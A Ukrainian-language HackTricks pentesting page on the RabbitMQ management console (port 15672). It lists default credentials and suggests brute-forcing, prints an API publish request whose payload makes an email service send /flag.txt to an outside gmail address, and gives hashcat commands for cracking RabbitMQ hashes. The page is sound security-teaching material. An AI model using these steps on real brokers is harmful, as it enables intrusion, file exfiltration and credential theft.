15672 - Pentesting RabbitMQ Management

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Підказка щодо багів: зареєструйтеся на Intigriti, преміальній платформі для пошуку багів, створеній хакерами для хакерів! Приєднуйтесь до нас на https://go.intigriti.com/hacktricks сьогодні, і почніть заробляти винагороди до $100,000!

Основна інформація

Ви можете дізнатися більше про RabbitMQ в 5671,5672 - Вентестінг AMQP. На цьому порту ви можете знайти веб-консоль керування RabbitMQ, якщо ввімкнений плагін управління. Головна сторінка повинна виглядати так:

Перелік

Стандартні облікові дані: "guest":"guest". Якщо вони не працюють, ви можете спробувати перебрати вхід.

Для ручного запуску цього модуля вам потрібно виконати:

rabbitmq-plugins enable rabbitmq_management
service rabbitmq-server restart

Після успішної аутентифікації ви побачите адміністративну консоль:

Також, якщо у вас є дійсні облікові дані, вам може бути цікава інформація з http://localhost:15672/api/connections

Також варто зазначити, що можливо публікувати дані всередині черги за допомогою API цієї служби за допомогою запиту наступного вигляду:

POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
Host: 172.32.56.72:15672
Authorization: Basic dGVzdDp0ZXN0
Accept: */*
Content-Type: application/json;charset=UTF-8
Content-Length: 267

{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"zevtnax+ppp@gmail.com\", \"attachments\": [{\"path\": \"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}

Злам хешування

echo <base64 rabbit mq hash> | base64 -d | xxd -pr -c128 | perl -pe 's/^(.{8})(.*)/$2:$1/' > hash.txt
hashcat -m 1420 --hex-salt hash.txt wordlist

Shodan

  • port:15672 http

Підказка щодо винагороди за вразливості: зареєструйтесь на Intigriti, преміальній платформі для винагород за вразливості, створеній хакерами для хакерів! Приєднуйтесь до нас на https://go.intigriti.com/hacktricks сьогодні, і почніть заробляти винагороди до $100,000!

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Last updated